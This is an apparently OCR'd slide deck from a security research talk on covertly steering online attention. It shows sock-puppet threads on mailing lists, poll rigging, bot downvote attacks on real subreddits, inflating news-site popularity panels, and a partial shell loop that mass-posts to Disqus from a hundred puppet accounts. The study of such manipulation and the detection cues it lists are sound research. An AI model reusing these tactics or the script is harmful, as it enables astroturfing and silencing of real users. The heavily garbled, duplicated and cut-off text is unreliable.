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Egypt Cuts Off Most Internet ai 

By MATT RICHTEL 
Published: January 28, 2011 

Autocratic governments often limit phone and Inti 
tense times. But the Internet has never faced anytl 
happened in Egypt on Friday, when the governmei 
80 million people and a modernizing economy cut 
access to the network and shut down cellphone sei 
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Do you know why your app is slo 

We do. 



Libya cuts off Internet service: network 
monitor 



LOS ANGELES Sat Feb 19. 201 1 10:24pm EST 
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RELATED NEWS 

Protesters hold Bahrain 
square 

Libya cuts off Internet 
service: network monitor 



(Reuters) - Internet service has been cut off in Libya for a second 
consecutive day as protesters step up demonstrations against 
longtime leader Muammar Gaddafi, a U.S. company that 
monitors Internet traffic said on Saturday. 






Amateurs cut access 
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Tunisia plants country-wide keystroke logger on 
Facebook 

Gmail and Yahoo! too 



NASTY SSL 3.0 vuln to be revealed soon - 
sources (Update: It's POODLE) 

Kill SSL 3.0 NOW god dammit NOW: HTTPS 
SAVAGED by vicious POODLE 



By Dan Goodin, 25 Jan 2011 



Son of Hudl: Tesco flogs new Atom-powered 
8.3-inch Android tablet 
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Linux and AIX Bare-Metal Recovery Webinar 

Malicious code injected into Tunisian versions of Facebook, Gmail, and Yahoo! stole 
login credentials of users critical of the North African nation's authoritarian 
government, according to security experts and news reports. 



Facebook 
security hole 
exposes 
Zuckerberg's 
privates 



Updated Army 
of 'socialbots' 
steal gigabytes of 
Facebook user 
data 

Zuckerberg's 

privates 



Updated Army 
of 'socialbots' 



The rogue JavaScript, which was individually customized to steal passwords for each 
site, worked when users tried to login without availing themselves of the secure 
sockets layer protection designed to prevent man-in-the-middle attacks. It was found 
injected into Tunisian versions of Facebook, Gmail, and Yahoo! in late December, 
around the same time that protestors began demanding the ouster of Zine el-Abidine 
Ben Ali, the president who ruled the country from 1987 until his ouster 10 days ago. 

Danny O'Brien, internet advocacy 
coordinator for the Committee to 
injected into Tunisian versions of Facebook, Gmail, and Yahoo! in late December, 
around the same time that protestors began demanding the ouster of Zine el-Abidine 
Ben Ali, the president who ruled the country from 1987 until his ouster 10 days ago. 




Russian hackers exploit 'Sandworm' bug 'to 
spy on NATO. EU PCs' 

Apple's new 'iPad Air 2' sliced open, revealing 
(possible) A8X core 
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Greedy datagrabs, 
crap security will 
KILL the Internet of 
Thingies 
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Kill SSL 3.0 NOW 
god dammit NOW: 
HTTPS SAVAGED 
by vicious POODLE 
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"»J London police use smartp x 
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Law enforcement technology 

London police use smartphones, social 
network to identify rioters 

Published 10 August 2011 Q Share i anara 

The rioters in London — and now, in other British cities — have 
been using Blackberries to outmaucuvcr the police; 
communicating via BlackBcrry instant-message technology, as 
well as by social networking sites like Faccbook and Twitter, the 
rioters repeatedly signaled fresh target areas to those caught up 
in the mayhem; RIM has now agreed to cooperate with Scotland 
Yard to turn over protestors using the service to coordinate their 
assaults; the police is also releasing CCTV images of the rioters to 
a group using face recognition technology' to identify and 
condemn rioters; the police is also using Flickr, Tublr, and 
Twitter to spot and identify participants in the riots 

Smartphones, especially 
j, Blackberries, have been a 
helpful information 
transmission and 
coordination tool for 
anti-government activists 
in a score of Arab 
countries - and they 
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‘A must-read for those who 
want to know more about 
the future of the Internet’ 

Josh Siverman, CEO, Skype 
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Overt censorship is routed around 





UGC - User Generated Content 
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UGC is a new(ish) paradigm 
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Nothing truly new under the sun 
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rent-a-crowds 
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How will Censorship handle 

UGC? 
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“So it’s not only certain people have 
a license to speak, now everyone 
has a license to speak. It’s a 
question of who gets heard.” 





Censorship 2.0 




Censorship 2.0 
This is Profoundly Important 
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Censorship 2.0 
This is Profoundly Important 




OPEN TECHNOLOGY FUND 
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sock puppet 

noun 

a false online identity, typically created by a person or group in order 
to promote their own opinions or views: both sides in the debate use sock 
puppets to make it seem as if scores of people are arguing a point. 



DERIVATIVES 

sock puppetry noun 



If we were evil-corp 
(or evil.gov) 
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what can be done ? 



what will be done ? 



what is being done ? 
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Challenge: 

How to measure efficacy 




mail lists 
online polls 
twitter 
reddit 
news sites 
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Why mailing lists? 



• “Interesting” people still use it 

• Personal curiosity 




what we wanted to do 
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Assume: 

An email is going to a mail list 



Can we make more people read it ? 
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Assume: 

An email is going to a mail list 



Can we make less people read it ? 




thinkst 

applied research 




How do we measure if more 
(or less) people read our mail? 
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Link Clicks 
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How do we write mail content 

worth clicking on ? 
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Plagiarize, Pilfer, Plunder & Pitch* 



*but don’t be too exciting 




thinkst 

applied research 




Control email 



1. Send email with link 

2. Wait 48 hours 

3. Count clicks 



Experimental email 



1 . Send email with link 

2. Puppets send several 
replies to make a 
longer discussion 
thread 

3. Wait 48 hours 



4. Count clicks 





■ riibcrationtechl Recent iQS privacy checks Keira Cran 

■ lliberationtechl Recent iQS privacy checks Todd We Her 

■ [liberationtechj Recen t iQ S privacy checks, duncan at opentnailbox.org 

■ fliberationtechl Recent iQS privacy checks Keira Cran 
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Control email 



Experimental email 



1 . Send email with link 



1 . Send email with link 



2. Wait 48 hours 

3. Count clicks 



2. Sock puppets send several 
separate emails starting new 
threads 

3. Wait 48 hours 



4. Count clicks 





riiberationtechl RIPE NCC Internet-wide measurement project duncan at openmai lbox.org 

ssa-observer: organising nsa leaks by attack vector ToddWeiler 



fliberationtechl Mapping out physical surveillance across a city Cody Tarrant 



Hibcrationtcchl NAv open access journal from Usenix Ryan Bartos 
fliberationtechl fSPAM:##l|FSF email self defence project Greg White 
fliberationtechl Thfc Hacking Team Commercial and are there others? Karen Dunnes 
lliberationtechl Viler features bein^z blocked by the Gambian povt? Mary Bukow ski 
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rai” also had another success 
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VulDB: Apple Mac OS X up to 13.1.0 Stack Guard stack_chk__guard buffer overflow 

General 

scipID: 13247 & 

Affected: Apple Mac OS X up to 13.1.0 ^ 

Published: 05/15/2014 (rai) f 

Risk: I _ I problematic 



Created: 05/18/2014 
Entry: 74.7% complete 

Summary 

A vulnerability was found in Apple Mac OS X up to 13.1.0. It has been rated as probl 
function stack chk guard of the component Stack Guard. The manipulation with a 
buffer overflow vulnerability. Impacted is confidentiality, integrity, and availability. 

The weakness was disclosed 05/15/2014 by rai as Mac OS X stack_chk_guard not a 
mailinglist post (Full-Disclosure). The advisory is shared for download at seclists 
invovled in the public release. The advisory contains: 

All credit due to the anon pastebin poster. 



The exploitation is known to be difficult. Attacking locally is a requirement. A single 
exploitation. Technical details as well as a public exploit are known. 



A public exploit has been developed by rai in ANSI C and been published immedia 
declared as proof-of-concept. The exploit is shared for download at maker.fea.st ' 
is: 



extern long atackchkguard 8 ; 



#include 





Improved Distract Att From X 



• combine both approaches 

• when a email on X appears, start several distraction 
threads 

• attract attention to the distractor threads by lengthen 
the threads with sock puppet mails 

• prepare juicy distractor threads ahead of time 




Uses for evil.{corp,gov} 



start distractor threads around emails from opponents 
others you wish not to get as much attention 

add light discussion to attract attention to your emails 

discredit opponents by doing a bad sock puppetry 
operation on their behalf 
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Why Polls ? 



Used by a few major news sites 

• Huffington Post, Al Jazeera, etc. 

• Many more random bloggers 

Even a Golden Globe movie awards poll 
Readers see the results of polls 
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Read Later 



In a stunning result, the winner of the third annual 
TIME too poll and new owner of the title World's 
Most Influential Person is moot. The 21-ycar-old 
college student and founder of the online community 
4chan.0rg, whose real name is Christopher Poole, 
received 16,794,368 votes and an average influence 
rating of 90 (out of a possible 100) to handily beat 
the likes of Barack Obama, Vladimir Putin and 
Oprah Winfrey. To put the magnitude of the upset in 
perspective, it’s worth noting that everyone moot 
beat out actually has a job. 
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Surely this is a solved problem 
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Landslide Win 



Subtle Win 




HuffPo Readers Poll 



THE HUFFPOST/YOUGOV POLL. 



How closely are you following news about the group known as the Islamic State, 
ISIS or ISIL that has been operating in Syria and Iraq? 

■ YouGov: All Americans 1 8+ ■ HuffPost Readers 



Very closely Somewhat closely 




Not very closely 




Not closely at all 







Subtle Win 



THE HUFFPOST/YOUGOV POLL 



How closely are you following news about the group known as the Islamic State, 
ISIS or ISIL that has been operating in Syria and Iraq? 

■ YouGov: All Americans 18 + ■ HuffPost Readers 
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Landslide Win 



THE HUFFPOST/Y OUGOV POLL Q 

How closely are you following new's about the group known as the Islamic State, 
ISIS or ISIL that has been operating in Syria and Iraq? 

■ YouGov: A] Americans 18 + ■ HufTPost Readers 

Very closely Somewhat closely 

21 % 13 % 

Not very closely Not closely at all 

■I 








these polls have a serious 
credibility problem 
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in 140 seconds.. 
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TL;DR 




Gilad Lotan bought followers and did some 
cool analysis of the network graph* 




*httPs://medium.com/i-data/fake-friends-with-real-benefits-eec8c4693bd3 






Timeline Crowding 
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root@netsec /]# 




hot I new | rising | top | gilded | wiki | promoted 

41 Follow /r/netsec on Twitter, Facebook, or Google+ H 



Aa 



[Featured Post] /r/netsec's Q2 2014 Information Security Hiring Thread 



TCP reassembly bug in FreeBSD can cause kernel crash, possible memory disclosure, (freetosd.org> 

sub fitted 3 hours ago by bonsaivfeng 
5 comments save hide report 



♦ How to Safely Generate a Random Number (like 6ae51281cde590) Uockpuppct.org) 

26 sjtj-nftted A rrnutes ago by WastoK 
4 comment save hide delete nsfw 



Tails 1.0 released! (tails. boum.org) 

335 submitted l day ago by beetycrkmg 

47 comments save hide report 




OpenSSH make compiling against OpenSSL optional (artide.gmane.org) 

# . 4 0n itt«J .in hur ago by ph5J 
comment save hide report 



♦ 



An overview of how reddit's new CSS filter works. Ueif.netsec 1 

submitted 1 dary ego by spiadug 
. +1 ii comments save hide report 



Revocation still doesn't work (impenalviolet org) 

submitted 1/ hours ago by raymi 
2 comments save hide report 



How To Setup Darkcomet RAT with download! 

^ubmlttod 46 nr lutes ego by TbeEpTfc 





On large subreddits like 
worldnews, 50 isn’t enough for 

a full win 
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Upvote articles we want to promote 
Downvote articles we want to kill 




Let’s also try down voting.. 
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downvote stuff to knock into moderation queue 

below user/subreddit preference 
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Trickle Downvoting: only down 
vote as many up votes as new 

articles have 
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Up-vote our target 
Trickle down-vote others 
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Mass-DownVoting 



What would happen if we down 
voted all new articles as they 

appeared? 
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Began with worldnews 




’’I 



Tyacre 19 po nts an hour aQO 



How the heck is this at 56 downvotes after 4 minutes?! 

permalink save report give gold reply 





Then.. 
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WE'RE UNDER ATTACK, COMRADES! STAY CALM AND DON'T MOVE - WE'RE FIGHTING THIS 
5 THING WITH EVERYTHING WE'VE GOT! (reddlt.com) 

r submitted 5 months ago by Jamie_byron dean to /r/clrdebroke2 



MY SUBREDOrTS ^ 



FRONT AIL RANDOM PICS FUNNY GAMING ASKREDDIT WORLDNEWS NEWS VIDEOS IAMA TODAYlLEARNED AWW ADV1CSANIMALS SCIENCE MUSIC MOVIES BESTOF BOOKS EARTHPORN EXPLAINUKE1M 



reddit 

subscribed 

your front page 




explore 



multi reddits 

new! create sets of 
subreddits to view 
together. 

for starters, try one 
of these: 



redditnews 



redditpets 

multibeta 

to hide these 
samples, create a 
multi of your own: 

explore multis 



everything 



saved 



hot new rising controversial top gilded wiki promoted 

Q trending subreddits /r/OutOfTheLoop /r/ Bo red Celebs /r/ukra.na /r/Glitch_ln_the_Matrtx /r/Starwars 23 comments 

Everyone, meet my little brother 

(imQUr.COm) 

submitted 2 hours ago by Slothduction to /r/AdviceAnimals 

71 comments share save hide report 

This duck sucks, (j.imgur.com) 

submitted 6 hours ago by Bodysalt to /r/funny 

588 comments share save hide report 




st! 



Amazing what mods can do for a 10 year old game (HL2) 

submitted 5 hours ago by DrSlappyPants to /r/gamlng 

955 comments share save hide report 

Early Movie Concept Arts dmgur.com) 

f submitted 5 hours ago by chaths to /r/ movies 

I — tJ 640 comments share save hide report 



imQur.com j 



GOOD BOY (j.imgur.com) 
submitted 7 hours ago by CORNLORD to /r/glfs 

644 comments share save hide report 




^ This year's birthday treasure hunt for my son. (.mgur.com) 

submitted 7 hours ago by crujones43 to /r/pics 

467 comments share save hide report 

John Oliver reads an unexpected and hilarious response from POM Wonderful after skewering them on his show 

0 submitted 5 hours ago by theruins to /r/videos 

188 comments share save hide report 

While I was drinking coffee this morning, my dog brought me this. I have no idea where it came from. 

submitted 7 hours ago by NikonNights to /r/aww 

509 comments share save hide report 



m g i 



♦ /r/worldnews is currently under a downvote attack - here's what you need to know, and what you can do 

^062 |Aa~ sv*> m, tt©d 4 hours ago by slapchopsuey to /r/worldnews 

794 comments share save hide report 



ilf.woridn 



TIL researchers have invented a helmet that gives humans simulated 360° of Vision, allowing a person to avoid 
object tossed outside the normal human field of view, orisa.fr) 



submitted 6 hours ago by hans__grouper to /r/todayi learned 

291 comments share save hide report 
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/r/worldnews is currently under a downvote attack - here's what you need to know, and what you can do c 

1576 submitted 13 hours ago by slapchopsuey 

♦ c ^ 

You've probably noticed that the up/down vote numbers have suddenly turned very strange In the past few hours, 

with everything being downvoted below zero. This is because /r/worldnews is under attack. The source of the 
downvoting is currently unknown but we and the admins are investigating and doing our best to find out. 

The purpose of this attack is to disrupt the subreddit. It does this by delivering enough downvotes to render posts 
invisible by reddit's default settings, and to discourage your participating by downvoting everything below zero. 

Here's what you need to know: 

• Don’t worry about the downvotes affecting your karma. The unusual votes (in this case, downvotes) will be 
wiped out when the source of the problem is identified. This will probably take a few days. 

• One of the goals of the attack is to render posts invisible by downvoting them below the default threshold 
in users’ preferences settings. The way you can neutralize that part of the attack is by changing the 
thershold of invisiblity in your user preferences. Here’s how: 1. In the upper right of your screen in the 
area with your username, click preferences. 2. In preferences, go to the "link options" section, and change 

the final line, where it says "don't show me sites with a score of less than " . You can set it to any 

negative number (ex. -100), but even better than filling in a negative number is just leaving the box blank. 

By leaving the box blank you will completely neutralize the attackers’ ability to make posts invisible. 

• The "hot" tab will be broken for the duration of the attack, but we recommend browsing by the "new" tab 

(/r/worldnews/new). 

• We also recommend voting; obviously we can’t tell you how to vote, but human votes help minimize the 
impact of the attackers, and it only takes a fraction of a second to click the arrows. 

If you like reading and participating in /r/worldnews, following the above tips can help restore most of the 
everyday /r/worldnews experience for you, and with your participating in voting, you can help to weaken and 
expose the attackers, so the admins can solve the problem faster. 

We apologize for the disruption, we appreciate your patience, and we welcome any tips you have for how we can 
improve the /r/worldnews user experience in this time of difficulty. 



1589 comments save hide give gold report 




Much speculation ensued .. 
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Simultaneously, we ran the 
same thing on netsec. . . 
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But netsec moderators responded 
with intelligent discussion and 
roped in official reddit admins to 
talk about the problem.. 
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[-] t ■ [S HOD] 23 points 19 hours ago 

I initially messaged all the admins through the reddit.com modmail, /u/cupcakel713 was the one who responded. I could 
try bringing it up with them but don’t believe it will be worth my time. 



permallnk save parent report give gold reply 



[-] Deimorz [A] 76 points 18 hours ago* 

You had a group of about 20 bots that were being used to downvote posts in the subreddit. We rendered the voting from 
those accounts ineffective, but to make it more difficult for the controller of the bots to realize that they’ve been disabled, 
we still need to make it look like their votes are applying. If we just throw away their votes entirely, the controller’s going 
to see that their bots have been blocked, and change up what they're doing immediately. 

lhii^ciudc mcic d 1 1 vj w ay lu Ccn wniCTl vicwci 3 aic a^ouuaicu vviui \iic uiulacu vUici w c nave iu diiuvv a lu cvci yuiic 

that looks like the votes are still applying (even though, as you said, we don't actually rank using it internally). The fake 
score can't be only shown to bot accounts. If the controller opens a submission in an incognito window via TOR or 
something, we’d have no way of linking them back to the bots. So when their 20 downvotes are gone there, they’d know 
what happened. This is /r/netsec, I’m sure I don’t need to elaborate on how many other options there are for separating 
yourself from this sort of thing. The only feasible option is showing the fake scores to everyone unless we want detection 
to be trivial. 

Being able to hide scores on submissions temporarily like you suggested might help some, but it really just delays the 
problem, it doesn't solve it. There are also various undesirable side effects from hiding submission scores that don't apply 
as much to comments. Over the years, a number of subreddits have tried experiments with hiding all submission scores 
using CSS like you've done, and they pretty much universally decided that it was a bad idea. Because the "hot" ranking 
involves both score and time, with things dropping in rank based on how old they are, being able to see the scores lets the 
viewer easily get an idea of how popular/significant different submissions are. Without that information available, it 
becomes extremely difficult for someone to look at a subreddit’s front page and quickly figure out which submissions were 
the most popular recently. 

I was the one that added the ability for moderators to temporarily hide comment scores, and I've definitely thought about 
extending it to submissions as well. But seeing how poorly all of those experiments that tried to do the same thing with 
CSS ended up going has made me hesitant about it. We do already have a very "light" score-hiding for submissions, where 
you can't see the score for the first 2 hours unless you actually visit the comments page. I’m not fully convinced that 
allowing true hiding like we have for comments would be a good thing, and most likely especially not for longer time 
periods since it makes the front page more and more confusing the longer the scores are hidden for. 
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This should have been much 

easier to spot 



SA-CORE-2014-005 - Drupal core - SQL injection (dmpai.org) 

submitted 12 hours ago by darknessproz 

7 comments share Instapaper 




This should have been much 

easier to spot 



SA-CORE-2014-005 - Drupal core - SQL injection 



submitted 12 hours ago by darknesspnoz 

7 comments share Instapaper 



voting in synch 
signup times 

some common email domains 




pattern of names 

ip-addresses from known open proxies 
user-agents: headers 
low karma interactors 



BTW... Two months later 



this post was submitted on 05 May 2014 

0 points (46% like it) 

54 upvotes 63 downvotos 

shortlink: https //redd, it /2 4rhai 




this post was submitted on 05 May 2014 

337 points (83% upvoted) 

shortlink: http://redd.it/24rhai 
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This should have been much 

easier to spot 



SA-CORE-2014-005 - Drupal core - SQL injection 

submitted 12 hours ago by darknessproz 

7 comments share Instapaper 



• voting in synch 

• signup times 

• some common email domains 




pattern of names 

ip-addresses from known open proxies 
user-agents: headers 

low karma interactors 



Growing Personas for Karma 
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Everything i needed to know about managing hackers, i learnt from my DVD collection.. 



Does twitter kill the blogging star ? 


Memory Corruption Attacks. The (almost) complete history.. 


Some Computer Security Prezi's 


Anonymity loves Company 


Tell HN: Toy app thrown together for fun 


Too many InfoSec Conferences? (Infographic Inside) 


Tell HN: Subscription Service that covers InfoSec Happenings.. 


What Anonymous taught us about Cyber War 


Searchable Security Conference Site 


LulzSec will be used to Usher in Regulation (few of us will like) 


Create graphs/nodes/edges in JavaScript (an arbor.js tutorial) 


Automated Shoulder Surfing Attacks (Computer Vision meets on screen keyboards) 


BlackHat 2011 (according to Twitter) 


(Simple) Chrome plugin for GPG/PGP in GMail 


Update: (Simple)Chrome plugin to enable GPG in Gmail 


Oracles Mary Ann Davidson lashes out at Security Firm 


Poll: Spotted the Polls/Karma Link? 


Etsy's Office-Hacker Job shows established companies the way.. 



You and Your Research, a modern take 






23 Links - Karma: 99 
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mail lists 
online polls 
twitter 
reddit 
news sites 



comment sy? 
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Why News Sites? 
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Hindustan times | livemint | livehindustan | more'' 

Hindustan imes.com 



delhi - [ min21 °c / max35°c] | city weather^ 



=11 Monday. October 13. 2014 | Last Updated 03:32 1ST 




^ Search 



india world cities comment entertainment life & style sports business tech autos multimedia epaper sell on OLX shopping coupons jobs matrimonial 
0 L X" Pe Bechde! 

Cyclone Hudhud leaves trail of 
devastation; 6 killed in Andhra 
Pradesh, Odisha ***• 



S- 



Cyclone Hudhud pounded the coastal 
districts of Andhra Pradesh and Odisha 
with heavy rain and winds of almost 
195 kmph leaving six people dead and 
a trail of devastation with 
Visakhapatnam, where the very severe 
storm made landfall, bearing the brunt. NDRF 
helplines: 01126107953; 09711077372 

Pakistan targets 15 posts in Jammu, 
seeks UN intervention 

Pakistan heavily shelled 15 border 
outposts and hamlets in Amia sector of 
Jammu and Kashmir early Sunday 
even as it wrote to UN chief Ban Ki- 
moon blaming India for the escalation 
in border clashes and sought UN 
intervention on Kashmir. 

Rahul Gandhi to do a BJP, veterans 
will make way for Gen Next 

In what may set off alarm bells for 
many powerful Congress veterans, 
Rahul Gandhi is learnt to be planning 
to introduce some drastic measures, 
including bringing up a new set of 






don't miss 

In pics: Hudhud takes India by storm 

Cyclone Hudhud hit India’s east coast with 
monstrous ferocity on Sunday, killing at least six 
people and leaving behind a trail of destruction 
In Andhra Pradesh and neighbouring Odisha. 




most viewed 

stories photos videos 

> India hits back with vengeance, strikes 37 Pak 
posts, 15 killed 

> Pakistan taught 'befitting lesson', says Modi after 
decline in firing 

> Hudhud intensifies; Odisha. Andhra brace for 
impact 

> Vishal Bharadwaj’s Haider isn’t just 'cry freedom', 
it's Gandhian plea for peace 

> Kailash Satyarthi's crusade to save childhood 
continues; 60 mn still need him 

more » 





SlBJOT 



NariTu followed 



sports 



cricket 



Download 
Central 
The Replacements 
and their album. Let 
It Be, has influenced 
many indie bands that 



4th O0I Wl In IND 

India 

West Indies 

October 17. 2014, 14:30 
(1ST) 

Other Fixtures 



football 



tennis 



Mohammed Shami a vital cog in MS 
Dhoni’s plans 






Can we influence this panel? 
Get articles on it or keep articles 

off it? 




thinkst 

applied research 




Maft Guardian 

AFRICA'S BEST READ 
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MaildSuardian 

AFRICA'S BEST READ 



NEWS OPINION BUSINESS ARTS & CULTURE EDUCATION SCI-TECH MULTIMEDIA SPECIAL REPORTS IN THE PAPER ZAPIRO PARTNERS 



NATIONAL AFRICA WORLD ENVIRONMENT SPORT HEALTH DATA AMABHUNGANE 



Q Search 



hippOc&zo 



SEARCH 



Megachurches: The 
hidden pillar of 
Nigeria's economy 

AFRICA I TIM COCKS 

Exactly how much of Nigeria's $510bn GDP 
megachurches make up is difficult to assess, 
since they are, like the oil sector, largely 
opaque entities. 

comments (0) 

+ TB Joshua's church: Built, like others, on 
shifting sands 

+ ANCYL to block TB Joshua from entering SA 
+ Press pause on prophet TB Joshua's power 



Obituary: The warmth and laughter of 
Chris van Wyk 





Most Popular This Week 



MOST READ 



MOST COMMENTED 



LATEST NEWS 




Why is Ebola being treated as an 'African 
disease?' 

AFRICA i REUTERS 

The head of the African Development Bank has criticised the 
international response to the Ebola outbreak as too little, too late. 

comments (2) 



Dewani describes meeting Anni in plea 
document 

LesetJa Kganyago named new Reserve Bank 
governor 

Megachurches: The hidden pillar of 
Nigeria's economy 

Union demands Telkom retract 
retrenchment letters to staff 
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AFRICA'S BEST READ 



NEWS OPINION BUSINESS ARTS 8 CULTURE EDUCATION SCI-TECH MULTIMEDIA SPECIAL REPORTS IN THE PAPER ZAP1RO PARTNERS hippO^za 




Megachurches: The 
hidden pillar of 
Nigeria's economy 

AFRICA TIM COCKS 

Exactly how much of Nigeria's $510bn GDP 
megachurches make up is difficult to assess, 
since they are, like the oil sector, largely 
opaque entities, 
comments (0) 

+ TB Joshua's church: Built, like others, on 
shifting sands 

+ ANCYL to block TB Joshua from entering SA 
* Press pause on prophet TB Joshua's power 

Why is Ebola being treated as an 'African 
disease?' 

AFRICA i REUTERS 

The head of the African Development Bank has criticised the 
international response to the Ebola outbreak as too little, too late, 
comments (2) 






Most Popular This Week 

MOST COMMENTED 



Dewani describes meeting Anni in plea 
document 

Lesetja Kganyago named new Reserve Bank 
governor 

Megachurches: The hidden pillar of 
Nigeria's economy 

Union demands Telkom retract 
retrenchment letters to staff 




Panel features recent articles 
with the most page views 










Page views we can control! 





uma could testify before Nkandla disciplinary 

ATIONAL l SAPA 

he PSA has not ruled out the possibility of President Jacob Zuma 
eing called to testify during the public works departmental hearings. 

comments (4) 



o timeline for return of Nigerian church 
ollapse bodies 



ATIONAL l SAPA 
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MOST COMMENTED 
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online.wsj.com/home-page 



The U.S. credit-card industry has found its 
sweet spot: a combination of moderate 
economic growth, low interest rates and 
consumers who have struck a balance between 
spending more and paying their bills on 
time. 23 min ago 



Retailers See Winds Filling 
Holiday Sales 

Ahead of the Tape: The National Retail 
Federation is expecting a 4.1% rise in holiday 
sales overall. With pump prices near three-year 
lows, more dollars should find their way to the 
mall. 

Irish Tax Loophole Could Close 

Ireland is expected on Tuesday to unveil 
changes to its tax code that could eventually 
close a well known corporate-tax loophole, the 
Double Irish. 

•* OPEC Members’ Rift Deepens 
A rift between OPEC members deepened over 
the weekend, as rival producers in the cartel 
moved in sharply different directions amid 
recently falling oil prices. 



► Banks Back Crisis Plan 

► U.K. Government Launches Sale of 
Eurostar Stake 

► Fed’s Tarullo Concerned 
About U.S. Productivity 

► ‘Gone Girl’ Leads Box Office Again 
Asia Makes a Move in Gold Trading 
Hyundai Land Deal: Short on Oversight 



■- Judges step up 
Electioneering 

Out-of-state groups are pouring 
money into judicial elections, 
upsetting genteel traditions 
under which judges in some 
states faced little opposition and avoided the 
ethically tricky process of stumping for votes. 




World > 



In Hong Kong, Both 
Sides Dig In 

Protest leaders and authorities 
dug in over the weekend, as 
Hong Kong’s pro-democracy 
demonstration looked to start a 
third week with increasingly pointed rhetoric 
and key roads still blocked. 

■ China, U.S. Standoff Deepens Over Protests 

► Bolivian Leader Poised for Third Term 

•* Silva Endorses Former Rival for 
Brazilian Presidency 

Moscow, Kiev Take Steps to Ease Tensions 




Popular Now What's This? 

a CDC Confirms 

1 Texas Health 

Worker Has Ebola 



2 A Musical Fix for 
American Schools 






•" Canadian 
Pacific 

Approached CSX 
About Merger 





‘Maximizer’ or 
‘Satisficer’— 
Which Are You? 
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•* OPEC Members’ Rift Deepens Amid 
Falling Oil Prices 



Show 5 More 





Popular Now 

"i CDC Confi 

1 Texas Hea 

Worker H 



Close 

Content engaging our readers now. with 
additional prominence accorded if the 
story is rapidly gaining attention. Our WSJ 
algorithm comprises 30% page views. 
20% Facebook, 20% Twitter, 20% email 
shares and 10% comments. 




Laila Blunt tweets following followers 

©LailaBlunt 2,071 16 1 

^ Laila Blunt @LailaBlunt * Jun 26 

Only if for 1629 online. wsj.com/articles/egypt... 

★ ••• View summary 




Laila Blunt QLailaBlunt * Jun 26 

Only if for 1628 online.wsj.com/articles/team-... 



• •• 



View summary 




Laila Blunt @LailaBlunt - Jun 26 

Only if for 1627 online.wsj.com/articles/gore-... 



4% tl ★ ••• 




Laila Blunt QLailaBlunt * Jun 26 

Only if for 1626 online.wsj.com/articles/want-... 



View summary 



View summary 




Laila Blunt @LailaBlunt * Jun 26 

Only if for 1625 online.wsj.com/articles/fifa-... 



€ 



• • • 




Laila Blunt QLailaBlunt * Jun 26 

Only if for 1624 online.wsj.com/articles/want-... 



• •• 



View summary 



View summary 



Laila Blunt @LailaBlunt * Jun 26 

Only if for 1623 online.wsj.com/articles/losse... 

tl ★ ••• 



View summary 



approval for their capital plans six more months 
to revise their submissions. 

Valcant CEO: Allergan Holders 
Support Vote on Takeover Offer 

Valeant Pharmaceuticals CEO Michael 
Pearson said the company is nearing its goal of 
rounding up enough support from Allergan 
shareholders to secure a vote on its $53 billion 
hostile bid. 817 PM 

Hachette Near Deal to Buy 
Perseus Books Group 
Hachette Book Group is near a deal to buy one 
of the biggest independent U.S. publishers, 
Perseus Books Group, beefing up its market 
share even as it is enmeshed in a bitter dispute 
with Amazon.com, said people familiar with the 
situation. 



Coulson Guilty^ttrooks 
Cleared in Tabloid 
Trial 



Two former senior News Corp 
editors met sharply different 
fates in the long-running phone- 
hacking case, as the jury cleared Rebekah 
Brooks of all charges but found Andy Coulson 
guilty of illegally intercepting voice-mail 
messages. 



• Prosecutors Have Little to Show 

• Cameron Issues Apology 

• C5 Graphic: Verdicts in the Trial 



At I -east 90 More Kidnapped in Nigeria 



Popular Now ww.™.? 

i Why Bad Posture at Work Is Bad for 
-L Health 

2 Social Media Fail to Live Up to Early 
Marketing Hype 

The Gluten-Free Craze: Is It Healthy? 




*• The Surprising Findings on 
Two-Year Degrees 






•* Go Pro Readies a Rare Gadget 11*0 

► Sequential Brands Nears Pact for 
Galaxy 

TARP Watchdog Monitors Credit Suisse 
Rig Investors Missed Stock Rally 



How to Stay Strong as You Age 



6 Washington Plan to Tax Yoga Leads 
to Political Posturing 



Ex-Im Bank Officials Face Probe 



AT&T, DirecTV Tout Deal to Congress 
Consumer Confidence at Six- Year High 
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LeBron James to Opt Out of Heat 
Deal 
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How Smart Is Your Crock-Pot? 
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•" Syrian Warplanes Strike in 
Western Iraq, Killing at Least... 
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LeBron James to Opt Out 


! Under Ousted CEO, 


► Food Makers' Secret 




of Heat Deal 


Target Lost Its Way 


Ingredient: Less Salt 


10 


Opinion: Fouad Ajami, Great 
American 
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up to $9 billion on BNP 
ms at other European 
>ttling U.S. probes of 
dtis could be higher 


Deep Germany Ready 
to Break U.S, Hearts 


o Focus on 


For the millions of Americans 
who have gotten swept onto the 
U.S. soccer bandwagon, be 
warned before this critical third 


as J. Butler, head of the 
atings, signal a 
ory activity involving 


game of the 2014 World Cup — Germany is the 
international soccer version of a bucket of cold 
water. 


jwer 

ver Wednesday after 
irorst session in more 


WSJ.0 

^ Google Readies TV 
Set-Top Box 


ded, but No 


Google is to unveil a new 
television set-top box on 
Wednesday as it races 
Amazon.com, Apple and others 


warned that airbags in 
plode, but they haven’t 
recall, leaving 
auto makers in an 


to control digital content in the home. 

• €» Video: Preview of Google I/O Conference 

■ Live Broadcast Via Google Glass 

• ‘Play* Has Much in Store 

Review: Stern on the Galaxy Tab S 
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Great White Shark 
Population Surges 



V^itpt >i ft% i t u i va 
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France Approves 
GE's Rid for Alstom, 
and More 




How to Deal With 
the Office 
Oversharer 
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1 •" Opinion: Fouad Ajami, Great 

American 



*■ U.S. Set to Export First Oil Since 

'70s 

Social Media Fail to Live Up to Early 
Marketing Hype 

•" Google Readies TV Set-Top Box 



^ The Gluten-Free Craze: Is It Healthy? 
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Cost to register 30k accounts: 
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Cost to share 30k stories: 
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web services 






mail lists 
online polls 
twitter 
reddit 
news sites 



comment sy? 
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In Brief 



Disqus let’s you drop a few lines of .js in your page 
which magically gives you an entire commenting 
system. 

Comments can be voted up/down which affects order. 

User profiles are visible across sites and your 
comments are gathered in your Disqus profile page. 

Admins get a nifty interface to moderate and maintain 
their comment threads. 




Used by Wordpress blogs, 
Tumblrs, soccer mom forums 




thinkst 

applied research 




and CNN, Al Jazeera, Bloomberg, 
The Next Web, NPR, The Atlantic, 
IGN, The Daily Telegraph etc 
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They don’t control the full 

message 
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• Login: left as an exercise for the reader 

• Mass post: 

export thread="threadid";export msg="mymessage"; (for i in 
seq -f "userprefix%g" 1 100';do echo "curl -b Y'Sffi.cookiesV 
-d \”thread=${thread}&message=${msg}&api_key=${API_KEY} 
\” http://disqus.com/api/3.0/posts/create.json”;done;)|parallel 

• Mass vote: 

export post="postid";export vote="1 (for i in seq -f 
